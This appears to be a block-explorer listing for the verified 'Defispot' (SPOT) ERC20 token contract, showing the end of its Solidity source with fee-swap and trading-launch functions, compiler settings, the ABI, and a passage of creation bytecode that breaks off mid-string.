            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }


    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        if (contractBalance == 0) {
            return;
        }

        if (contractBalance > swapTokensAtAmount * 20) {
            contractBalance = swapTokensAtAmount * 20;
        }

        swapTokensForEth(contractBalance);

        payable(SpotRouter).transfer(address(this).balance);
    }


    function enableTrading() external payable onlyOwner {
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory())
            .createPair(address(this), uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        _approve(address(this), address(uniswapV2Router), ~uint256(0));
        uniswapV2Router.addLiquidityETH{value: msg.value}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);

        tradingActive = true;
    }
}







/** Copyright Defispot 2023
*/

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[],"name":"SpotRouter","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526001600a60006101000a81548160ff0219169083151502179055506000600a60016101000a81548160ff0219169083151502179055506000600a60026101000a81548160ff0219169083151502179055506001600d60146101000a81548160ff0219169083151502179055503480156200007d57600080fd5b506040518060400160405280600881526020017f4465666973706f740000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f53504f54000000000000000000000000000000000000000000000000000000008152508160039081620000fb919062000a6e565b5080600490816200010d919062000a6e565b50505062000130620001246200035660201b60201c565b6200035e60201b60201c565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506200015c8160016200042460201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506003600e819055506003600f8190555060006c01431e0fae6d7217caa000000090506103e8601482620001c4919062000b84565b620001d0919062000bfe565b6007819055506103e8601482620001e8919062000b84565b620001f4919062000bfe565b6009819055506103e86001826200020c919062000b84565b62000218919062000bfe565b6008819055507303e8b628c3d89137bf57c8a094e363614018a257601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000295620002876200050e60201b60201c565b60016200053860201b60201c565b620002a83060016200053860201b60201c565b620002bd61dead60016200053860201b60201c565b620002f2601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200053860201b60201c565b62000314620003066200050e60201b60201c565b60016200042460201b60201c565b620003273060016200042460201b60201c565b6200033c61dead60016200042460201b60201c565b6200034e33826200067260201b60201c565b505062000dce565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b620004346200035660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff166200045a6200050e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1614620004b3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004aa9062000c97565b60405180910390fd5b80601260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620005486200035660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff166200056e6200050e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1614620005c7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620005be9062000c97565b60405180910390fd5b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000666919062000cd6565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620006e4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006db9062000d43565b60405180910390fd5b620006f860008383620007ea60201b60201c565b80600260008282546200070c919062000d65565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000763919062000d65565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620007ca919062000db1565b60405180910390a3620007e660008383620007ef60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200087657607f821691505b6020821081036200088c576200088b6200082e565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620008f67fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620008b7565b620009028683620008b7565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200094f6200094962000943846200091a565b62000924565b6200091a565b9050919050565b6000819050919050565b6200096b836200092e565b620009836200097a8262000956565b848454620008c4565b825550505050565b600090565b6200099a6200098b565b620009a781848462000960565b505050565b5b81811015620009cf57620009c360008262000990565b600181019050620009ad565b5050565b601f82111562000a1e57620009e88162000892565b620009f384620008a7565b8101602085101562000a03578190505b62000a1b62000a1285620008a7565b830182620009ac565b50505b505050565b600082821c905092915050565b600062000a436000198460080262000a23565b1980831691505092915050565b600062000a5e838362000a30565b9150826002028217905092915050565b62000a7982620007f4565b67ffffffffffffffff81111562000a955762000a94620007ff565b5b62000aa182546200085d565b62000aae828285620009d3565b600060209050601f83116001811462000ae6576000841562000ad1578287015190505b62000add858262000a50565b86555062000b4d565b601f19841662000af68662000892565b60005b8281101562000b205784890151825560018201915060208501945060208101905062000af9565b8683101562000b40578489015162000b3c601f89168262000a30565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000b91826200091a565b915062000b9e836200091a565b925082820262000bae816200091a565b9150828204841483151762000bc85762000bc762000b55565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000c0b826200091a565b915062000c18836200091a565b92508262000c2b5762000c2a62000bcf565b5b828204905092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000c7f60208362000c36565b915062000c8c8262000c47565b602082019050919050565b6000602082019050818103600083015262000cb28162000c70565b9050919050565b60008115159050919050565b62000cd08162000cb9565b82525050565b600060208201905062000ced600083018462000cc5565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d2b601f8362000c36565b915062000d388262000cf3565b602082019050919050565b6000602082019050818103600083015262000d5e8162000d1c565b9050919050565b600062000d72826200091a565b915062000d7f836200091a565b925082820190508082111562000d9a5762000d9962000b55565b5b92915050565b62000dab816200091a565b82525050565b600060208201905062000dc8600083018462000da0565b92915050565b60805161423b62000e22600039600081816109fe01528181610f700152818161101b015281816111a8015281816111d101528181611eed01528181612dd201528181612eb30152612eda015261423b6000f3fe60806040526004361061021e5760003560e01c80637571336a11610123578063bbc0c742116100ab578063e2f456051161006f578063e2f4560514610857578063e884f26014610882578063ec885dc7146108ad578063f2fde38b146108d8578063f8b45b05146109015761027b565b8063bbc0c74214610770578063c02466681461079b578063c876d0b9146107c4578063c8c8ebe4146107ef578063dd62ed3e1461081a5761027b565b806395d89b41116100f257806395d89b41146106655780639a7a23d614610690578063a457c2d7146106b9578063a9059cbb146106f6578063b62496f5146107335761027b565b80637571336a146105de5780638a8c523c146106075780638da5cb5b14610611578063924de9b71461063c5761027b565b806339509351116101a65780634fbee193116101755780634fbee193146104f75780636ddd17131461053457806370a082311461055f578063715018a61461059c578063751039fc146105b35761027b565b806339509351146104395780633ed614bd1461047657806349bd5a5e146104a15780634a62bb65146104cc5761027b565b806318160ddd116101ed57806318160ddd146103505780631d266b281461037b57806323b872dd146103a657806327c8f835146103e3578063313ce5671461040e5761027b565b806306fdde0314610280578063095ea7b3146102ab57806310d5de53146102e85780631694505e146103255761027b565b3661027b57601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661027957600080fd5b005b600080fd5b34801561028c57600080fd5b5061029561092c565b6040516102a29190613000565b60405180910390f35b3480156102b757600080fd5b506102d260048036038101906102cd91906130bb565b6109be565b6040516102df9190613116565b60405180910390f35b3480156102f457600080fd5b5061030f600480360381019061030a9190613131565b6109dc565b60405161031c9190613116565b60405180910390f35b34801561033157600080fd5b5061033a6109fc565b60405161034791906131bd565b60405180910390f35b34801561035c57600080fd5b50610365610a20565b60405161037291906131e7565b60405180910390f35b34801561038757600080fd5b50610390610a2a565b60405161039d91906131e7565b60405180910390f35b3480156103b257600080fd5b506103cd60048036038101906103c89190613202565b610a30565b6040516103da9190613116565b60405180910390f35b3480156103ef57600080fd5b506103f8610b28565b6040516104059190613264565b60405180910390f35b34801561041a57600080fd5b50610423610b2e565b604051610430919061329b565b60405180910390f35b34801561044557600080fd5b50610460600480360381019061045b91906130bb565b610b37565b60405161046d9190613116565b60405180910390f35b34801561048257600080fd5b5061048b610be3565b6040516104989190613264565b60405180910390f35b3480156104ad57600080fd5b506104b6610c09565b6040516104c39190613264565b60405180910390f35b3480156104d857600080fd5b506104e1610c2f565b6040516104ee9190613116565b60405180910390f35b34801561050357600080fd5b5061051e60048036038101906105199190613131565b610c42565b60405161052b9190613116565b60405180910390f35b34801561054057600080fd5b50610549610c98565b6040516105569190613116565b60405180910390f35b34801561056b57600080fd5b5061058660048036038101906105819190613131565b610cab565b60405161059391906131e7565b60405180910390f35b3480156105a857600080fd5b506105b1610cf3565b005b3480156105bf57600080fd5b506105c8610d7b565b6040516105d59190613116565b60405180910390f35b3480156105ea57600080fd5b50610605600480360381019061060091906132e2565b610e1b565b005b61060f610ef2565b005b34801561061d57600080fd5b506106266112a6565b6040516106339190613264565b60405180910390f35b34801561064857600080fd5b50610663600480360381019061065e9190613322565b6112d0565b005b34801561067157600080fd5b5061067a611369565b6040516106879190613000565b60405180910390f35b34801561069c57600080fd5b506106b760048036038101906106b291906132e2565b6113fb565b005b3480156106c557600080fd5b506106e060048036038101906106db91906130bb565b611515565b6040516106ed9190613116565b60405180910390f35b34801561070257600080fd5b5061071d600480360381019061071891906130bb565b611600565b60405161072a9190613116565b60405180910390f35b34801561073f57600080fd5b5061075a60048036038101906107559190613131565b61161e565b6040516107679190613116565b60405180910390f35b34801561077c57600080fd5b5061078561163e565b6040516107929190613116565b60405180910390f35b3480156107a757600080fd5b506107c260048036038101906107bd91906132e2565b611651565b005b3480156107d057600080fd5b506107d9611776565b6040516107e69190613116565b60405180910390f35b3480156107fb57600080fd5b50610804611789565b60405161081191906131e7565b60405180910390f35b34801561082657600080fd5b50610841600480360381019061083c919061334f565b61178f565b60405161084e91906131e7565b60405180910390f35b34801561086357600080fd5b5061086c611816565b60405161087991906131e7565b60405180910390f35b34801561088e57600080fd5b5061089761181c565b6040516108a49190613116565b60405180910390f35b3480156108b957600080fd5b506108c26118bc565b6040516108cf91906131e7565b60405180910390f35b3480156108e457600080fd5b506108ff60048036038101906108fa9190613131565b6118c2565b005b34801561090d57600080fd5b506109166119b9565b60405161092391906131e7565b60405180910390f35b60606003805461093b906133be565b80601f0160208091040260200160405190810160405280929190818152602001828054610967906133be565b80156109b45780601f10610989576101008083540402835291602001916109b4565b820191906000526020600020905b81548152906001019060200180831161099757829003601f168201915b5050505050905090565b60006109d26109cb6119bf565b84846119c7565b6001905092915050565b60126020528060005260406000206000915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b600e5481565b6000610a3d848484611b90565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610a886119bf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90613461565b60405180910390fd5b610b1c85610b146119bf565b8584036119c7565b60019150509392505050565b61dead81565b60006012905090565b6000610bd9610b446119bf565b848460016000610b526119bf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610bd491906134b0565b6119c7565b6001905092915050565b601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a60009054906101000a900460ff1681565b6000601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cfb6119bf565b73ffffffffffffffffffffffffffffffffffffffff16610d196112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610d6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6690613530565b60405180910390fd5b610d796000612848565b565b6000610d856119bf565b73ffffffffffffffffffffffffffffffffffffffff16610da36112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610df9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df090613530565b60405180910390fd5b6000600a60006101000a81548160ff0219169083151502179055506001905090565b610e236119bf565b73ffffffffffffffffffffffffffffffffffffffff16610e416112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610e97576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8e90613530565b60405180910390fd5b80601260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b610efa6119bf565b73ffffffffffffffffffffffffffffffffffffffff16610f186112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610f6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6590613530565b60405180910390fd5b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610fd9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ffd9190613565565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396307f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611084573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110a89190613565565b6040518363ffffffff1660e01b81526004016110c5929190613592565b6020604051808303816000875af11580156110e4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111089190613565565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611175600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610e1b565b6111a2600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600161290e565b6111cf307f00000000000000000000000000000000000000000000000000000000000000006000196119c7565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719343061121630610cab565b6000806112216112a6565b426040518863ffffffff1660e01b8152600401611243969594939291906135f6565b60606040518083038185885af1158015611261573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611286919061366c565b5050506001600a60016101000a81548160ff021916908315150217905550565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6112d86119bf565b73ffffffffffffffffffffffffffffffffffffffff166112f66112a6565b73ffffffffffffffffffffffffffffffffffffffff161461134c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134390613530565b60405180910390fd5b80600a60026101000a81548160ff02191690831515021790555050565b606060048054611378906133be565b80601f01602080910402602001604051908101604052809291908181526020018280546113a4906133be565b80156113f15780601f106113c6576101008083540402835291602001916113f1565b820191906000526020600020905b8154815290600101906020018083116113d457829003601f168201915b5050505050905090565b6114036119bf565b73ffffffffffffffffffffffffffffffffffffffff166114216112a6565b73ffffffffffffffffffffffffffffffffffffffff1614611477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146e90613530565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611507576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114fe90613731565b60405180910390fd5b611511828261290e565b5050565b600080600160006115246119bf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156115e1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115d8906137c3565b60405180910390fd5b6115f56115ec6119bf565b858584036119c7565b600191505092915050565b600061161461160d6119bf565b8484611b90565b6001905092915050565b60136020528060005260406000206000915054906101000a900460ff1681565b600a60019054906101000a900460ff1681565b6116596119bf565b73ffffffffffffffffffffffffffffffffffffffff166116776112a6565b73ffffffffffffffffffffffffffffffffffffffff16146116cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116c490613530565b60405180910390fd5b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161176a9190613116565b60405180910390a25050565b600d60149054906101000a900460ff1681565b60075481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60085481565b60006118266119bf565b73ffffffffffffffffffffffffffffffffffffffff166118446112a6565b73ffffffffffffffffffffffffffffffffffffffff161461189a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161189190613530565b60405180910390fd5b6000600d60146101000a81548160ff0219169083151502179055506001905090565b600f5481565b6118ca6119bf565b73ffffffffffffffffffffffffffffffffffffffff166118e86112a6565b73ffffffffffffffffffffffffffffffffffffffff161461193e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193590613530565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036119ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a490613855565b60405180910390fd5b6119b681612848565b50565b60095481565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a2d906138e7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a9c90613979565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611b8391906131e7565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bf690613a0b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6590613a77565b60405180910390fd5b60008103611c8757611c82838360006129af565b612843565b600a60009054906101000a900460ff161561234c57611ca46112a6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611d125750611ce26112a6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611d4b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611d85575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611d9e5750600660149054906101000a900460ff16155b1561234b57600a60019054906101000a900460ff16611e9857601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611e585750601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b611e97576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e8e90613ae3565b60405180910390fd5b5b600d60149054906101000a900460ff161561206257611eb56112a6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015611f3c57507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611f965750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156120615743600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541061201c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161201390613b9b565b60405180910390fd5b43600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a90046